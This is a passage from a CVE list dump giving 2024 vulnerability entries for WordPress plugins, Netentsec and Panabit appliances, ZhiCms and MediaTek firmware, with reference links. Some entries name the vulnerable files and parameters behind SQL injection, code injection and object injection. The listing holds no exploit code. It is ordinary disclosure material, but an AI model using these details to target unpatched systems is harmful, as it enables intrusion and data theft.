CVE    2024    2025    Candidate    The "BuddyPress WooCommerce My Account Integration. Create WooCommerce Member Pages" plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.20 via deserialization of untrusted input in the get_simple_request function. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/changeset/3055634/wc4bp/trunk/class/includes/class-request-helper.php   |   URL:https://plugins.trac.wordpress.org/changeset/3055634/wc4bp/trunk/class/includes/class-request-helper.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/78da9e79-399e-43e3-ac27-a162861cae71?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/78da9e79-399e-43e3-ac27-a162861cae71?source=cve    Assigned (20240229)
CVE    2024    2022    Candidate    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/list_ipAddressPolicy.php. The manipulation of the argument GroupId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255301 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-255301 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255301   |   MISC:VDB-255301 | Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php sql injection   |   URL:https://vuldb.com/?id.255301   |   MISC:https://github.com/zouzuo1994321/cve/blob/main/cve.md   |   URL:https://github.com/zouzuo1994321/cve/blob/main/cve.md    Assigned (20240229)
CVE    2024    2021    Candidate    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. Affected is an unknown function of the file /admin/list_localuser.php. The manipulation of the argument ResId leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255300. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-255300 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255300   |   MISC:VDB-255300 | Netentsec NS-ASG Application Security Gateway list_localuser.php sql injection   |   URL:https://vuldb.com/?id.255300   |   MISC:https://github.com/dtxharry/cve/blob/main/cve.md   |   URL:https://github.com/dtxharry/cve/blob/main/cve.md    Assigned (20240229)
CVE    2024    2020    Candidate    The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form page href parameter in all versions up to, and including, 5.1.56 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the professional version or higher.    MISC:https://wordpress.org/plugins/calculated-fields-form/#developers   |   URL:https://wordpress.org/plugins/calculated-fields-form/#developers   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/45bfa9fb-f35b-4fd4-8553-cf87bf69df6b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/45bfa9fb-f35b-4fd4-8553-cf87bf69df6b?source=cve    Assigned (20240229)
CVE    2024    2016    Candidate    A vulnerability, which was classified as critical, was found in ZhiCms 4.0. Affected is the function index of the file app/manage/controller/setcontroller.php. The manipulation of the argument sitename leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255270 is the identifier assigned to this vulnerability.    MISC:VDB-255270 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255270   |   MISC:VDB-255270 | ZhiCms setcontroller.php index code injection   |   URL:https://vuldb.com/?id.255270   |   MISC:https://gist.github.com/L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5   |   URL:https://gist.github.com/L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5    Assigned (20240229)
CVE    2024    2015    Candidate    A vulnerability, which was classified as critical, has been found in ZhiCms 4.0. This issue affects the function getindexdata of the file app/index/controller/mcontroller.php. The manipulation of the argument key leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255269 was assigned to this vulnerability.    MISC:VDB-255269 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255269   |   MISC:VDB-255269 | ZhiCms mcontroller.php getindexdata sql injection   |   URL:https://vuldb.com/?id.255269   |   MISC:https://gist.github.com/L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5   |   URL:https://gist.github.com/L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5    Assigned (20240229)
CVE    2024    2014    Candidate    A vulnerability classified as critical was found in Panabit Panalog 202103080942. This vulnerability affects unknown code of the file /Maintain/sprog_upstatus.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-255268 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255268   |   MISC:VDB-255268 | Panabit Panalog sprog_upstatus.php sql injection   |   URL:https://vuldb.com/?id.255268   |   MISC:https://github.com/mashroompc0527/CVE/blob/main/vul.md   |   URL:https://github.com/mashroompc0527/CVE/blob/main/vul.md    Assigned (20240229)
CVE    2024    2009    Candidate    A vulnerability was found in Nway Pro 9. It has been rated as problematic. Affected by this issue is the function ajax_login_submit_form of the file login\index.php of the component Argument Handler. The manipulation of the argument rsargs[] leads to information exposure through error message. The attack may be launched remotely. VDB-255266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-255266 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255266   |   MISC:VDB-255266 | Nway Pro 9 Argument login\index.php ajax_login_submit_form rsargs[] information exposure   |   URL:https://vuldb.com/?id.255266    Assigned (20240229)
CVE    2024    2007    Candidate    A vulnerability was found in OpenBMB XAgent 1.0.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Privileged Mode. The manipulation leads to sandbox issue. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-255265 was assigned to this vulnerability.    MISC:VDB-255265 | CTI Indicators (IOB, IOC, TTP)   |   URL:https://vuldb.com/?ctiid.255265   |   MISC:VDB-255265 | OpenBMB XAgent Privileged Mode sandbox   |   URL:https://vuldb.com/?id.255265   |   MISC:https://github.com/OpenBMB/XAgent/issues/386   |   URL:https://github.com/OpenBMB/XAgent/issues/386    Assigned (20240229)
CVE    2024    2006    Candidate    The Post Grid, Slider & Carousel Ultimate – with Shortcode, Gutenberg Block & Elementor Widget plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.7 via deserialization of untrusted input in the outpost_shortcode_metabox_markup function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/browser/post-grid-carousel-ultimate/trunk/includes/classes/metabox.php#L43   |   URL:https://plugins.trac.wordpress.org/browser/post-grid-carousel-ultimate/trunk/includes/classes/metabox.php#L43   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=/post-grid-carousel-ultimate/tags/1.6.7&old=3045923&new_path=/post-grid-carousel-ultimate/tags/1.6.8&new=3045923&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/post-grid-carousel-ultimate/tags/1.6.7&old=3045923&new_path=/post-grid-carousel-ultimate/tags/1.6.8&new=3045923&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8cf1b234-862b-41a0-ab63-a986f8023613?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8cf1b234-862b-41a0-ab63-a986f8023613?source=cve    Assigned (20240229)
CVE    2024    2005    Candidate    In Blue Planet® products through 22.12, a misconfiguration in the SAML implementation allows for privilege escalation. Only products using SAML authentication are affected. Blue Planet® has released software updates that address this vulnerability for the affected products. Customers are advised to upgrade their Blue Planet products to the latest software version as soon as possible. The software updates can be downloaded from the Ciena Support Portal.    MISC:https://www.ciena.com/product-security   |   URL:https://www.ciena.com/product-security    Assigned (20240229)
CVE    2024    20038    Candidate    In pq, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08495932; Issue ID: ALPS08495932.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20037    Candidate    In pq, there is a possible write-what-where condition due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08495937; Issue ID: ALPS08495937.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20036    Candidate    In vdec, there is a possible permission bypass due to a permissions bypass. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08509508; Issue ID: ALPS08509508.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20034    Candidate    In battery, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08488849; Issue ID: ALPS08488849.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20033    Candidate    In nvram, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08499945; Issue ID: ALPS08499945.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20032    Candidate    In aee, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08487630; Issue ID: MSV-1020.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20031    Candidate    In da, there is a possible out of bounds write due to lack of validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541742.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20030    Candidate    In da, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541741.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20029    Candidate    In wlan firmware, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08477406; Issue ID: MSV-1010.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20028    Candidate    In da, there is a possible out of bounds write due to lack of validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541687.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20027    Candidate    In da, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541633.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20026    Candidate    In da, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541632.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20025    Candidate    In da, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541686; Issue ID: ALPS08541686.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20024    Candidate    In flashc, there is a possible out of bounds write due to lack of validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541635; Issue ID: ALPS08541635.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20023    Candidate    In flashc, there is a possible out of bounds write due to lack of validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541638; Issue ID: ALPS08541638.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20022    Candidate    In lk, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08528255; Issue ID: ALPS08528255.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20020    Candidate    In OPTEE, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08522504; Issue ID: ALPS08522504.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    2002    Candidate    A double-free vulnerability was found in libdwarf. In a multiply-corrupted DWARF object, libdwarf may try to dealloc(free) an allocation twice, potentially causing unpredictable and various results.    MISC:RHBZ#2267700   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2267700   |   MISC:https://access.redhat.com/security/cve/CVE-2024-2002   |   URL:https://access.redhat.com/security/cve/CVE-2024-2002   |   MISC:https://github.com/davea42/libdwarf-code/blob/main/bugxml/data.txt   |   URL:https://github.com/davea42/libdwarf-code/blob/main/bugxml/data.txt    Assigned (20240229)
CVE    2024    20019    Candidate    In wlan driver, there is a possible memory leak due to improper input handling. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00351241; Issue ID: MSV-1173.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20018    Candidate    In wlan driver, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00348479; Issue ID: MSV-1019.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20017    Candidate    In wlan service, there is a possible out of bounds write due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00350938; Issue ID: MSV-1132.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20016    Candidate    In ged, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07835901; Issue ID: ALPS07835901.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20015    Candidate    In telephony, there is a possible escalation of privilege due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08441419; Issue ID: ALPS08441419.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20013    Candidate    In keyInstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08471742; Issue ID: ALPS08308608.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20012    Candidate    In keyInstall, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08358566; Issue ID: ALPS08358566.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20011    Candidate    In alac decoder, there is a possible information disclosure due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08441146; Issue ID: ALPS08441146.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20010    Candidate    In keyInstall, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08358560; Issue ID: ALPS08358560.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    2001    Candidate    A Cross-Site Scripting vulnerability in Cockpit CMS affecting version 2.7.0. This vulnerability could allow an authenticated user to upload an infected PDF file and store a malicious JavaScript payload to be executed when the file is uploaded.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cockpit-cms   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cockpit-cms    Assigned (20240229)
CVE    2024    20009    Candidate    In alac decoder, there is a possible out of bounds write due to incorrect error handling. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08441150; Issue ID: ALPS08441150.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20007    Candidate    In mp3 decoder, there is a possible out of bounds write due to a race condition. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08441369; Issue ID: ALPS08441369.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20006    Candidate    In da, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08477148; Issue ID: ALPS08477148.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20005    Candidate    In da, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08355599; Issue ID: ALPS08355599.    MISC:https://corp.mediatek.com/product-security-bulletin/March-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/March-2024    Assigned (20231102)
CVE    2024    20004    Candidate    In Modem NL1, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if NW sent an invalid NR RRC Connection Setup message, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01191612; Issue ID: MOLY01195812 (MSV-985).    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20003    Candidate    In Modem NL1, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if NW sent an invalid NR RRC Connection Setup message, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01191612; Issue ID: MOLY01191612 (MSV-981).    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20002    Candidate    In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961715; Issue ID: DTV03961715.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    20001    Candidate    In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961601; Issue ID: DTV03961601.    MISC:https://corp.mediatek.com/product-security-bulletin/February-2024   |   URL:https://corp.mediatek.com/product-security-bulletin/February-2024    Assigned (20231102)
CVE    2024    2000    Candidate    The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'navigation_dots' parameter of the Multi Scroll Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://premiumaddons.com/change-log/   |   URL:https://premiumaddons.com/change-log/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/eee517de-a47e-47c9-8322-92ce772191b0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/eee517de-a47e-47c9-8322-92ce772191b0?source=cve    Assigned (20240228)
CVE    2024    1998    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-1795. Reason: This candidate is a reservation duplicate of CVE-2024-1795. Notes: All CVE users should reference CVE-2024-1795 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.        Assigned (20240228)
CVE    2024    1997    Candidate    The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'premium_fbchat_app_id' parameter of the Messenger Chat Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://premiumaddons.com/change-log/   |   URL:https://premiumaddons.com/change-log/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ffa6a6b-bbb4-4361-8585-ce2cdb7d1d7e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ffa6a6b-bbb4-4361-8585-ce2cdb7d1d7e?source=cve    Assigned (20240228)
CVE    2024    1996    Candidate    The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's IHover widget link in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://premiumaddons.com/change-log/   |   URL:https://premiumaddons.com/change-log/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/48fa5f3b-000b-406e-b7ee-51af5720cf72?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/48fa5f3b-000b-406e-b7ee-51af5720cf72?source=cve    Assigned (20240228)
CVE    2024    1995    Candidate    The Smart Custom Fields plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relational_posts_search() function in all versions up to, and including, 4.2.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve post content that is password protected and/or private.    MISC:https://github.com/inc2734/smart-custom-fields/commit/67cb6d75bd8189668f721dbd2dc7a3036851be1b   |   URL:https://github.com/inc2734/smart-custom-fields/commit/67cb6d75bd8189668f721dbd2dc7a3036851be1b   |   MISC:https://plugins.trac.wordpress.org/browser/smart-custom-fields/trunk/classes/fields/class.field-related-posts.php#L78   |   URL:https://plugins.trac.wordpress.org/browser/smart-custom-fields/trunk/classes/fields/class.field-related-posts.php#L78   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052172%40smart-custom-fields&new=3052172%40smart-custom-fields&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052172%40smart-custom-fields&new=3052172%40smart-custom-fields&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e966a266-4265-4a72-8a50-e872805219a7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e966a266-4265-4a72-8a50-e872805219a7?source=cve    Assigned (20240228)
CVE    2024    1992    Candidate    ** REJECT ** Rejected as duplicate of CVE-2024-2306        Assigned (20240228)
CVE    2024    1989    Candidate    The Social Sharing Plugin – Sassy Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Sassy_Social_Share' shortcode in all versions up to, and including, 3.3.58 due to insufficient input sanitization and output escaping on user supplied attributes such as 'url'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-sharing-networks.php#L65   |   URL:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-sharing-networks.php#L65   |   MISC:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-shortcodes.php#L228   |   URL:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-shortcodes.php#L228   |   MISC:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-shortcodes.php#L308   |   URL:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-shortcodes.php#L308   |   MISC:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/public/class-sassy-social-share-public.php#L513   |   URL:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/public/class-sassy-social-share-public.php#L513   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044857%40sassy-social-share%2Ftrunk&old=3038976%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file6   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044857%40sassy-social-share%2Ftrunk&old=3038976%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file6   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/bdceb07a-87d2-4708-b76b-5a8fcfff0818?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/bdceb07a-87d2-4708-b76b-5a8fcfff0818?source=cve    Assigned (20240228)
CVE    2024    1987    Candidate    The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.4.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3047285%40wp-members%2Ftrunk&old=3025452%40wp-members%2Ftrunk&sfp_email=&sfph_mail=#file5   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3047285%40wp-members%2Ftrunk&old=3025452%40wp-members%2Ftrunk&sfp_email=&sfph_mail=#file5   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/631e1061-50b1-4df2-b876-37b4cd3e2478?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/631e1061-50b1-4df2-b876-37b4cd3e2478?source=cve    Assigned (20240228)
CVE    2024    1986    Candidate    The Booster Elite for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the wc_add_new_product() function in all versions up to, and including, 7.1.7. This makes it possible for customer-level attackers, and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. This is only exploitable when the user product upload functionality is enabled.    MISC:https://booster.io/   |   URL:https://booster.io/   |   MISC:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L132   |   URL:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L132   |   MISC:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L138   |   URL:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L138   |   MISC:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L322   |   URL:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L322   |   MISC:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L333   |   